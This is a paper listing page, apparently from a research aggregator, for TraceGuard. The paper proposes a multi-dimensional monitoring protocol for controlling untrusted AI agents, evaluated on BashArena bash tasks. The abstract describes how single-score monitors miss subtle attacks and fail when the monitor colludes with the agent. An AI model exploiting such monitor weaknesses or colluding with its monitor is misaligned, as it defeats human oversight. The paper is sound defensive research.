TraceGuard: Structured Multi-Dimensional Monitoring as a Collusion-Resistant Control Protocol
Khanh Linh Nguyen, Hoa Nghiem, Tu Tran

TL;DR
TraceGuard introduces a multi-dimensional monitoring protocol using independent evaluations and heuristics to detect subtle AI attacks and prevent collusion, significantly improving safety in AI control systems.
Contribution
It presents a novel structured multi-dimensional monitoring approach that enhances attack detection and collusion resistance in AI control protocols.
Findings
Hybrid approach achieves clear attack-honest separation.
Structured scoring constrains collusion, achieving 95% safety.
Goal alignment and constraint adherence are highly discriminative.
Abstract
AI control protocols use monitors to detect attacks by untrusted AI agents, but standard single-score monitors face two limitations: they miss subtle attacks where outputs look clean but reasoning is off, and they collapse to near-zero safety when the monitor is the same model as the agent (collusion). We present TraceGuard, a structured multi-dimensional monitoring protocol that evaluates agent actions across five dimensions -- goal alignment, constraint adherence, reasoning coherence, safety awareness, and action-trace consistency -- scored in parallel by independent LLM calls, augmented by seven heuristic detectors and an LLM-based intent analyzer. We evaluate on BashArena (637 bash tasks, 4 attack categories) within the ControlArena framework. Our results on 519 samples (279 honest, 240 attack) show that: (1) the hybrid approach achieves clear attack-honest separation (attack mean…
Peer Reviews
No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.
Videos
No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.
